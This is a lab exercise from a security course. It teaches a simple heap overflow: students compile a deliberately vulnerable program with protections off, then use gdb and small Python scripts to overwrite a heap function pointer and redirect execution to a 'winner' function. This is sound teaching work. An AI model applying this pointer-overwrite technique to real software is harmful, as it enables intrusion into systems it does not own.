ED 205: Very Simple Heap Overflow (10 pts)

What You Need

A 32-bit x86 Kali Linux machine, real or virtual. The project was written on Kali 2.

Purpose

To practice exploiting a very simple heap overflow vulnerability. This one is easy to exploit because there's a pointer in the heap that is used for a function call. That makes a heap overflow as simple as a stack overflow targeting EIP.

Creating a Vulnerable Program

This program just echoes back text from its command-line argument.

In Kali, in a Terminal window, execute these commands:

curl https://samsclass.info/127/proj/heap0.c > heap0.c
gcc heap0.c -w -g -no-pie -z execstack -o heap0
./heap0 HELLO
./heap0 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
As shown below, running the program with "HELLO" works, showing a "level has not been passed" message, but running it with 90 'A' characters causes a "Segmentation fault".

Examining the Source Code

In Kali, in a Terminal window, execute these commands:

nano heap0.c
As shown below, two objects are defined (called "data structures"), which will be stored in a portion of memory called a "heap".

The first object is name[64], which has enough space for 64 characters.

Then comes fp, which holds a 4-byte pointer--that is, a RAM address.

Finally, there's a function named winner(). As you might expect, our goal is to execute that function.

Scroll down to see the rest of heap0.c, as shown below.

Close the file with Ctrl+X.

Observing the Heap

Execute these commands to run the program in the gdb debugger, place a breakpoint, run it with a short input string, and examine the process map:
gdb ./heap0
list 25,40
b 38
run AAAA
info proc map
Find the heap. When I did it, the heap was the fourth item on the list, starting at 0x804b000, as shown below.

Execute this instruction to see the contents of the heap, replacing the address with the correct address of the heap on your system.


x/120x 0x804b000
Find "0x41414141" on the heap, as shown below. You may have to press Enter to see more pages of memory to find it on your system.

As highlighted below, two values are stored on the heap: "0x41414141" is 'AAAA', and a short distance after that there's an address, which was 0x080484c1 when I did it.

Execute this instruction to disassemble the function "nowinner".


disassemble nowinner
As shown below, this function starts at the address stored on the heap: 0x080484c1 on my system.

Execute these instructions to exit the debugger.

q
y

Observing a Crash

In Kali, in a Terminal window, execute this command:

nano h1
Enter this code, as shown below:

#!/usr/bin/python

print 'A' * 90

Save the file with Ctrl+X, Y, Enter.

Execute these commands to make the file executable, test it, and send it to heap0:


chmod a+x h1
./h1
./heap0 $(./h1)

90 characters are enough to crash the program.

Controlling the EIP

Execute these commands to make a modified attack file, to find out what characters ended up in $eip.

cp h1 h2
nano h2
Modify the file to send only 70 'A' characters followed by 20 bytes in a nonrepeating pattern, as shown below.

Save the file with Ctrl+X, Y, Enter.

Debugging the Program

Execute these commands to run the program in the gdb debugger, send the attack to it, and examine the registers.

gdb -q ./heap0
run $(./h2)
info registers
q
y
As shown below, the program crashes with $eip = 0x36303530, or the ASCII text '0506'.

On my system, the characters before the EIP were 70 "A"s + '0001020304' for a total of 80 characters.

Targeting the EIP

Execute these commands to make an modified attack program that attempts to put 'BCDE' into the EIP.

cp h2 h3
nano h3
Modify the file as shown below.

Save the file with Ctrl+X, Y, Enter.

Debugging the Program

Execute these commands to run the program in the gdb debugger, send the attack to it, and examine the registers.

gdb -q ./heap0
run $(./h3)
info registers
As shown below, the program crashes with $eip = 0x45444342, or the ASCII text 'BCDE'.

Finding an Address to Inject

Execute these commands to disassemble the winner() function.

disassemble winner
q
y
As shown below, the function started at address 0x08048496 on my system. Your address may be different--use the address you see on your screen.

The Final Exploit File

Execute these commands to make another attack program that puts 0x08048496 into the EIP.

cp h3 h4
nano h4
Modify the file as shown below.

Save the file with Ctrl+X, Y, Enter.


ED 205.1 Heap Exploit (10 pts)

Testing the Exploit

Execute this command:

./heap0 $(./h4)
The flag appears, covered by a green box in the image below.

Sources

https://www.vulnhub.com/series/exploit-exercises,11/#

https://csg.utdallas.edu/wp-content/uploads/2012/08/Heap-Based-Exploitation.pdf

https://www.mattandreko.com/2012/01/10/exploit-exercises-heap-0/


Posted 9-17-15 by Sam Bowne
Revised 9-28-15
Revised for Kali 2018.1 2-22-18
Tested on Kali 2018.3 x86 and it worked fine 9-22-18